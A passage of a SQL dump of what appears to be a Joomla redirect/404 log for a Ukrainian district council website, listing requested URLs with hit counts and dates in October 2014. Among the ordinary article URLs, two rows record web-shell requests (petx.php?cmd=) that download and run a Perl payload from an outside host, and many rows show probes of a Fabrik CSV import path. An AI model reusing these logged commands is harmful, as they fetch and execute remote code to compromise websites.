00:00:00',301),(8075,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1046:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-12 13:29:37','0000-00-00 00:00:00',301),(8076,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1243:2014-03-17-07-32-47&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-12 13:29:59','0000-00-00 00:00:00',301),(8077,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46&Itemid=85&lang=uk','','','',1,0,'2014-10-12 13:37:41','0000-00-00 00:00:00',301),(8078,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=uk','','','',2,0,'2014-10-12 13:41:42','0000-00-00 00:00:00',301),(8079,'http://malyn-rayrada.org.ua/images/stories/petx.php','','','',1,0,'2014-10-12 14:20:15','0000-00-00 00:00:00',301),(8080,'http://malyn-rayrada.org.ua/images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/x.log;fetch http://visionafricamagazine.com/scripts/x.log; perl x.log ; perl x.log ; perl x.log','','','',1,0,'2014-10-12 14:20:19','0000-00-00 00:00:00',301),(8081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-12 14:35:49','0000-00-00 00:00:00',301),(8082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-12 14:36:00','0000-00-00 00:00:00',301),(8083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-10-12 14:50:16','0000-00-00 00:00:00',301),(8084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=en&Itemid=','','','',6,0,'2014-10-12 14:50:38','0000-00-00 00:00:00',301),(8085,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-12 14:51:08','0000-00-00 00:00:00',301),(8086,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32&id=854:2012-12-11-13-40-55&lang=uk&option=com_content&view=article','','','',8,0,'2014-10-12 14:52:18','0000-00-00 00:00:00',301),(8087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-12 15:00:52','0000-00-00 00:00:00',301),(8088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=en','','','',2,0,'2014-10-12 15:18:53','0000-00-00 00:00:00',301),(8089,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47&Itemid=86&lang=uk','','','',1,0,'2014-10-12 15:21:59','0000-00-00 00:00:00',301),(8090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-12 15:25:10','0000-00-00 00:00:00',301),(8091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-12 15:35:09','0000-00-00 00:00:00',301),(8092,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=965:2013-03-14-10-56-03&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-12 16:21:52','0000-00-00 00:00:00',301),(8093,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1343:2014-06-14-17-26-47&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-12 16:22:11','0000-00-00 00:00:00',301),(8094,'http://www.malyn-rayrada.org.ua/index.php?Itemid=90&catid=50:--23042013-&id=994:2013-04-23-08-30-51&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-12 16:22:13','0000-00-00 00:00:00',301),(8095,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=911:2013-01-22-13-27-41&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-12 16:22:14','0000-00-00 00:00:00',301),(8096,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=922:2013-02-11-10-53-17&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-12 16:25:57','0000-00-00 00:00:00',301),(8097,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-12 16:30:45','0000-00-00 00:00:00',301),(8098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-12 16:35:52','0000-00-00 00:00:00',301),(8099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-12 16:45:08','0000-00-00 00:00:00',301),(8100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51&Itemid=92&lang=en','','','',3,0,'2014-10-12 16:53:56','0000-00-00 00:00:00',301),(8101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=en','','','',1,0,'2014-10-12 17:38:23','0000-00-00 00:00:00',301),(8102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=en','','','',1,0,'2014-10-12 17:38:31','0000-00-00 00:00:00',301),(8103,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=0&lang=uk','','','',3,0,'2014-10-12 17:45:30','0000-00-00 00:00:00',301),(8104,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=0&lang=ru','','','',2,0,'2014-10-12 18:13:38','0000-00-00 00:00:00',301),(8105,'http://www.malyn-rayrada.org.ua/index.php?lang=ru&option=com_phocagallery&view=categories','','','',8,0,'2014-10-12 18:22:34','0000-00-00 00:00:00',301),(8106,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=0&lang=uk','','','',2,0,'2014-10-12 18:28:43','0000-00-00 00:00:00',301),(8107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51&Itemid=92&lang=en','','','',5,0,'2014-10-12 18:44:32','0000-00-00 00:00:00',301),(8108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-10-12 19:04:01','0000-00-00 00:00:00',301),(8109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51&Itemid=92&lang=ru','','','',6,0,'2014-10-12 19:06:32','0000-00-00 00:00:00',301),(8110,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-10-12 19:06:42','0000-00-00 00:00:00',301),(8111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-10-12 19:07:23','0000-00-00 00:00:00',301),(8112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',24,0,'2014-10-12 19:10:11','0000-00-00 00:00:00',301),(8113,'http://www.malyn-rayrada.org.ua/news/components/com_community/index.html','','','',18,0,'2014-10-12 19:11:37','0000-00-00 00:00:00',301),(8114,'http://www.malyn-rayrada.org.ua/news/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',18,0,'2014-10-12 19:11:44','0000-00-00 00:00:00',301),(8115,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51&Itemid=92&lang=en','','','',2,0,'2014-10-12 19:27:38','0000-00-00 00:00:00',301),(8116,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1030:2013-06-17-06-46-59&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-12 21:00:14','0000-00-00 00:00:00',301),(8117,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-12 21:05:06','0000-00-00 00:00:00',301),(8118,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=uk','','','',2,0,'2014-10-12 21:53:55','0000-00-00 00:00:00',301),(8119,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=ru&limitstart=20','','','',4,0,'2014-10-12 22:02:31','0000-00-00 00:00:00',301),(8120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=en','','','',2,0,'2014-10-12 22:03:45','0000-00-00 00:00:00',301),(8121,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=983:2013-04-04-11-23-57&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-12 22:25:01','0000-00-00 00:00:00',301),(8122,'http://www.malyn-rayrada.org.ua/index.php?view=category&id=5:2010-06-05-12-51-34&option=com_content&Itemid=14&lang=en','','','',2,0,'2014-10-12 23:25:28','0000-00-00 00:00:00',301),(8123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',11,0,'2014-10-12 23:28:18','0000-00-00 00:00:00',301),(8124,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-10-12 23:28:46','0000-00-00 00:00:00',301),(8125,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1065:2013-08-14-12-52-50&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-12 23:38:54','0000-00-00 00:00:00',301),(8126,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&lang=uk&layout=default&page&print=1&tmpl=component&','',3,0,'2014-10-12 23:47:42','0000-00-00 00:00:00',301),(8127,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',6,0,'2014-10-13 00:13:58','0000-00-00 00:00:00',301),(8128,'http://www.malyn-rayrada.org.ua/forums/components/com_community/index.html','','','',9,0,'2014-10-13 00:21:44','0000-00-00 00:00:00',301),(8129,'http://www.malyn-rayrada.org.ua/forums/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',9,0,'2014-10-13 00:21:49','0000-00-00 00:00:00',301),(8130,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=7&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2014-10-13 00:39:51','0000-00-00 00:00:00',301),(8131,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',3,0,'2014-10-13 00:44:15','0000-00-00 00:00:00',301),(8132,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=ru&limitstart=20','','','',2,0,'2014-10-13 00:47:46','0000-00-00 00:00:00',301),(8133,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-13 00:50:06','0000-00-00 00:00:00',301),(8134,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=uk&limitstart=20','','','',2,0,'2014-10-13 00:56:38','0000-00-00 00:00:00',301),(8135,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1065:2013-08-14-12-52-50&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-13 01:01:30','0000-00-00 00:00:00',301),(8136,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=7&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-13 01:19:31','0000-00-00 00:00:00',301),(8137,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=962:-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 01:21:51','0000-00-00 00:00:00',301),(8138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=ru','','','',3,0,'2014-10-13 02:17:30','0000-00-00 00:00:00',301),(8139,'http://www.malyn-rayrada.org.ua/app-integrador/components/com_community/index.html','','','',1,0,'2014-10-13 03:14:21','0000-00-00 00:00:00',301),(8140,'http://www.malyn-rayrada.org.ua/app-integrador/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-13 03:14:25','0000-00-00 00:00:00',301),(8141,'http://www.malyn-rayrada.org.ua/f/components/com_community/index.html','','','',5,0,'2014-10-13 03:28:48','0000-00-00 00:00:00',301),(8142,'http://www.malyn-rayrada.org.ua/f/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',5,0,'2014-10-13 03:28:56','0000-00-00 00:00:00',301),(8143,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1053:2013-07-19-11-34-22&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 03:46:27','0000-00-00 00:00:00',301),(8144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59&Itemid=107&lang=uk','','','',4,0,'2014-10-13 04:58:21','0000-00-00 00:00:00',301),(8145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-13 05:00:23','0000-00-00 00:00:00',301),(8146,'http://www.malyn-rayrada.org.ua/trc/components/com_community/index.html','','','',1,0,'2014-10-13 05:46:01','0000-00-00 00:00:00',301),(8147,'http://www.malyn-rayrada.org.ua/trc/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-13 05:46:06','0000-00-00 00:00:00',301),(8148,'http://malyn-rayrada.org.ua/images/stories/link.php?rf','','','',2,0,'2014-10-13 05:55:20','0000-00-00 00:00:00',301),(8149,'http://www.malyn-rayrada.org.ua/index.php?id=7&Itemid=12&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-13 05:56:23','0000-00-00 00:00:00',301),(8150,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1036:2013-06-25-10-02-48&lang=en&option=com_content&view=article','','','',1,0,'2014-10-13 06:00:34','0000-00-00 00:00:00',301),(8151,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=918:-2013-2015-&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-13 06:07:02','0000-00-00 00:00:00',301),(8152,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1233:2014-03-03-10-28-35&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 06:09:27','0000-00-00 00:00:00',301),(8153,'http://www.malyn-rayrada.org.ua/shootingtalk/components/com_community/index.html','','','',2,0,'2014-10-13 07:20:56','0000-00-00 00:00:00',301),(8154,'http://www.malyn-rayrada.org.ua/shootingtalk/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-13 07:21:02','0000-00-00 00:00:00',301),(8155,'http://www.malyn-rayrada.org.ua/index.php?id=5&Itemid=6&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-13 07:46:52','0000-00-00 00:00:00',301),(8156,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-10-13 08:32:51','0000-00-00 00:00:00',301),(8157,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1205:2014-01-31-07-53-03&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-13 09:30:46','0000-00-00 00:00:00',301),(8158,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1018:2013-06-06-11-22-34&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 09:30:54','0000-00-00 00:00:00',301),(8159,'http://www.malyn-rayrada.org.ua/index.php?id=6&Itemid=9&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2014-10-13 09:38:44','0000-00-00 00:00:00',301),(8160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59&Itemid=107&lang=uk','','','',6,0,'2014-10-13 09:45:39','0000-00-00 00:00:00',301),(8161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-13 09:50:56','0000-00-00 00:00:00',301),(8162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=en','','','',2,0,'2014-10-13 09:55:54','0000-00-00 00:00:00',301),(8163,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=928:2013-02-21-09-10-17&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-13 11:04:32','0000-00-00 00:00:00',301),(8164,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1230:l-r&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 11:04:36','0000-00-00 00:00:00',301),(8165,'http://www.malyn-rayrada.org.ua/rent/components/com_community/index.html','','','',1,0,'2014-10-13 11:09:26','0000-00-00 00:00:00',301),(8166,'http://www.malyn-rayrada.org.ua/rent/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-13 11:09:30','0000-00-00 00:00:00',301),(8167,'http://www.malyn-rayrada.org.ua/side/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-13 11:18:21','0000-00-00 00:00:00',301),(8168,'http://www.malyn-rayrada.org.ua/index.php?id=3:2010-06-05-12-50-56&Itemid=7&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-13 12:05:15','0000-00-00 00:00:00',301),(8169,'http://www.malyn-rayrada.org.ua/index.php?id=4:2010-06-05-12-51-18&Itemid=8&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-13 12:34:43','0000-00-00 00:00:00',301),(8170,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1064:2013-08-09-07-52-21&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 12:37:25','0000-00-00 00:00:00',301),(8171,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1038:2013-06-28-10-19-47&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 12:37:32','0000-00-00 00:00:00',301),(8172,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=907:2013-01-21-08-54-59&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 12:38:18','0000-00-00 00:00:00',301),(8173,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1224:----25--2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 12:38:21','0000-00-00 00:00:00',301),(8174,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1112:2013-10-23-09-24-43&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 12:38:23','0000-00-00 00:00:00',301),(8175,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1221:2014-02-22-08-09-27&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 12:39:39','0000-00-00 00:00:00',301),(8176,'http://www.malyn-rayrada.org.ua/eventos/components/com_community/index.html','','','',1,0,'2014-10-13 13:49:40','0000-00-00 00:00:00',301),(8177,'http://www.malyn-rayrada.org.ua/eventos/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-13 13:49:44','0000-00-00 00:00:00',301),(8178,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1025:-2011-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 14:11:31','0000-00-00 00:00:00',301),(8179,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=925:-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 14:11:48','0000-00-00 00:00:00',301),(8180,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1369:-lr-&lang=en&option=com_content&view=article','','','',4,0,'2014-10-13 14:18:06','0000-00-00 00:00:00',301),(8181,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58&Itemid=105&lang=ru','','','',2,0,'2014-10-13 14:49:01','0000-00-00 00:00:00',301),(8182,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-13 15:04:34','0000-00-00 00:00:00',301),(8183,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1022:-------lr---&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-13 15:21:18','0000-00-00 00:00:00',301),(8184,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58:--30042014-&Itemid=105&lang=ru','','','',2,0,'2014-10-13 15:40:57','0000-00-00 00:00:00',301),(8185,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1357:22-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 15:45:19','0000-00-00 00:00:00',301),(8186,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1154:7-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 15:48:54','0000-00-00 00:00:00',301),(8187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-13 16:40:14','0000-00-00 00:00:00',301),(8188,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-13 16:44:29','0000-00-00 00:00:00',301),(8189,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1100:2013-10-02-18-03-10&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-13 16:55:07','0000-00-00 00:00:00',301),(8190,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1179:2014-01-21-12-44-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 17:19:14','0000-00-00 00:00:00',301),(8191,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1132:2013-11-13-10-02-24&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 17:19:18','0000-00-00 00:00:00',301),(8192,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1106:-qq&lang=en&option=com_content&view=article','','','',2,0,'2014-10-13 18:29:05','0000-00-00 00:00:00',301),(8193,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1189:2014-01-28-09-46-45&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-13 18:29:07','0000-00-00 00:00:00',301),(8194,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=892:2013-01-08-13-26-18&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-13 18:53:07','0000-00-00 00:00:00',301),(8195,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=999:2013-04-28-05-21-05&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 18:53:11','0000-00-00 00:00:00',301),(8196,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2014-01-06-08-19-15&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 18:53:18','0000-00-00 00:00:00',301),(8197,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56&Itemid=97&lang=en','','','',2,0,'2014-10-13 19:07:02','0000-00-00 00:00:00',301),(8198,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-13 19:34:16','0000-00-00 00:00:00',301),(8199,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-10-13 19:34:59','0000-00-00 00:00:00',301),(8200,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1044:2013-07-05-11-26-05&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-13 20:02:44','0000-00-00 00:00:00',301),(8201,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1181:2014-01-22-06-06-13&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-13 20:02:49','0000-00-00 00:00:00',301),(8202,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-13 20:22:25','0000-00-00 00:00:00',301),(8203,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1031:2013-06-17-06-49-26&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-13 20:26:17','0000-00-00 00:00:00',301),(8204,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1288:2014-04-23-06-50-40&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 20:26:20','0000-00-00 00:00:00',301),(8205,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1070:2013-08-23-04-27-00&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-13 20:27:10','0000-00-00 00:00:00',301),(8206,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=987:2013-04-15-06-06-41&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 20:35:19','0000-00-00 00:00:00',301),(8207,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1192:-2014-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 20:35:22','0000-00-00 00:00:00',301),(8208,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49&Itemid=88&lang=uk','','','',3,0,'2014-10-13 21:40:25','0000-00-00 00:00:00',301),(8209,'http://www.malyn-rayrada.org.ua/images/stories/petx.php','','','',4,0,'2014-10-13 22:08:31','0000-00-00 00:00:00',301),(8210,'http://www.malyn-rayrada.org.ua/images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/x.log;fetch http://visionafricamagazine.com/scripts/x.log; perl x.log ; perl x.log ; perl x','','','',1,0,'2014-10-13 22:08:37','0000-00-00 00:00:00',301),(8211,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=897:2013-01-18-07-40-55&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-13 22:09:38','0000-00-00 00:00:00',301),(8212,'http://malyn-rayrada.org.ua/index.php/malinshchina-ta-malinchani','','','',7,0,'2014-10-13 22:37:55','0000-00-00 00:00:00',301),(8213,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49:--12042013-&Itemid=88&lang=uk','','','',1,0,'2014-10-13 23:06:42','0000-00-00 00:00:00',301),(8214,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49&Itemid=88&lang=ru','','','',2,0,'2014-10-13 23:24:58','0000-00-00 00:00:00',301),(8215,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1305:-30----&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-13 23:32:01','0000-00-00 00:00:00',301),(8216,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1228:2014-02-27-14-42-41&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-13 23:32:07','0000-00-00 00:00:00',301),(8217,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-10-13 23:48:41','0000-00-00 